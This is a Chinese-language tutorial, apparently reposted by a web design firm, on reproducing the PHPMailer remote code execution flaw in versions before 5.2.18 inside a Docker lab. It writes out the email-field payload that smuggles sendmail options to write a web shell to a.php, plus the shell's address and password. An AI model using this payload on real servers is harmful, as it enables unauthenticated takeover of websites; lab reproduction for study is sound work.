PHPMailer中怎么復(fù)現(xiàn)遠(yuǎn)程命令執(zhí)行漏洞，相信很多沒有經(jīng)驗(yàn)的人對此束手無策，為此本文總結(jié)了問題出現(xiàn)的原因和解決方法，通過這篇文章希望你能解決這個問題。

我們提供的服務(wù)有：成都網(wǎng)站設(shè)計、成都網(wǎng)站建設(shè)、微信公眾號開發(fā)、網(wǎng)站優(yōu)化、網(wǎng)站認(rèn)證、湖里ssl等。為上千多家企事業(yè)單位解決了網(wǎng)站和推廣的問題。提供周到的售前咨詢和貼心的售后服務(wù)，是有科學(xué)管理、有技術(shù)的湖里網(wǎng)站制作公司

一、漏洞簡介

PHPMailer是PHP電子郵件創(chuàng)建及傳輸類，用于多個開源項(xiàng)目：WordPress, Drupal, 1CRM, SugarCRM, Yii, Joomla!等。

PHPMailer < 5.2.18版本存在安全漏洞，可使未經(jīng)身份驗(yàn)證的遠(yuǎn)程攻擊者在Web服務(wù)器用戶上下文中執(zhí)行任意代碼，遠(yuǎn)程控制目標(biāo)web應(yīng)用。

二、影響版本：

PHPMailer<5.2.18

三、漏洞復(fù)現(xiàn)

Docker環(huán)境：

dockerrun --rm -it -p8080:80vulnerables/cve-2016-10033

拉去鏡像啟動環(huán)境：

http://192.168.1.107:8080/

http://192.168.1.107:8080/在name處隨便輸入比如“aaa”，在email處輸入："aaa". -OQueueDirectory=/tmp/. -X/var/www/html/a.php @aaa.com在message處輸入一句話木馬：

上傳完一句話木馬后，頁面會響應(yīng)3-5分鐘，響應(yīng)時間較長

木馬地址：http://192.168.1.107:8080/a.php 密碼：thelostworld

虛擬終端：

使用腳本：

獲取腳本后臺回復(fù)“PHPMailer”獲取腳本

看完上述內(nèi)容，你們掌握PHPMailer中怎么復(fù)現(xiàn)遠(yuǎn)程命令執(zhí)行漏洞的方法了嗎？如果還想學(xué)到更多技能或想了解更多相關(guān)內(nèi)容，歡迎關(guān)注創(chuàng)新互聯(lián)行業(yè)資訊頻道，感謝各位的閱讀！